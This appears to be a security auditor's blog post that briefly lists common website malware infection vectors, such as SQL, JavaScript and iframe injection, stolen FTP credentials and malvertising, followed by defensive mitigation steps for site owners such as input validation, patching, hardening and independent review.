Last week’s blog I discussed mitigation steps recommended end users for protecting themselves from malware in general and specifically from drive by malware.
This week I will identify some of most common (popular) malware technical vectors for infecting web sites, and how web site owners can protect their sites.
Technical Malware Vectors
- SQL Injection Attack – exploit application layer security vulnerabilities in order to inject active code or change code in applications or direct attack of databases.
- Javascript Injection Attack – one form of an SQL attack.
- IFrame Injection Attack – strings or active code injected into the web page, sometimes due to poor input data validation.
- Javascript injection- invokes IFrames, active code.
- Stolen FTP credentials Attack – stolen FTP credentials for the web site to gain unauthorized access.
- Server Application Code Vulnerabilities – poorly written or not thoroughly tested code.
- Redirect Injection Attack – takes advantage of function of a web page to a web server of attacker’s choice.
- Malvertising – grabs user information even if publisher is doing a good job. Malvertizing injects dangerous code especially where there is the opportunity for user generated.
Mitigation Steps for Web Site Owners
- Incorporate security into application development / database access at the design stage. Do not treat application security as a bolt-on or afterthought. Particular emphasis on data input fields.
- Thoroughly test all data input fields and validation for input fields. Audit all user input fields and user contribution fields by internal audit or by a group other than the developers.
- Update and patch the Java Virtual Machine (JVM) and Java Developer Kits (JDK).
- Ensure the integrity of any third party tools for managing a web site, even seemingly innocuous apps like traffic counters.
- Constantly look for unauthorized changes in web site code, such as strings that cause URL redirects. Employ tools to identify unauthorized changes in code.
- Update and patch web server software.
- Harden the web server platform. Eliminate all unnecessary accounts, privileges, restrict access, and vigilantly monitor the logs for attempted but failed access, attempted unauthorized access, and of course successful unauthorized accesses.
- Consider deploying a second layer of anti-malware monitoring and diagnostic technology that is
specifically designed for web site security, with the abilities to block attack attempts, log the
attempted and successful attacks, and which will generate reports and alerts.
- Identify and remedy all network vulnerabilities for the infrastructure which houses the web site, its
platform, and of course its Internet access.
- Have an impartial set of eyes review all aspects of network security, including architecture (isolation of web site on a DMZ, etc.), policies and score of compliance with policies, security architecture and how effectively it is used, event log monitoring, and with the risk of repetition; timely and consistent upgrades and patching.
Have a secure week.
Regards
Ron Lepofsky, B.A. SC. (Mech Eng), CISSP
ERE Information Security Auditor
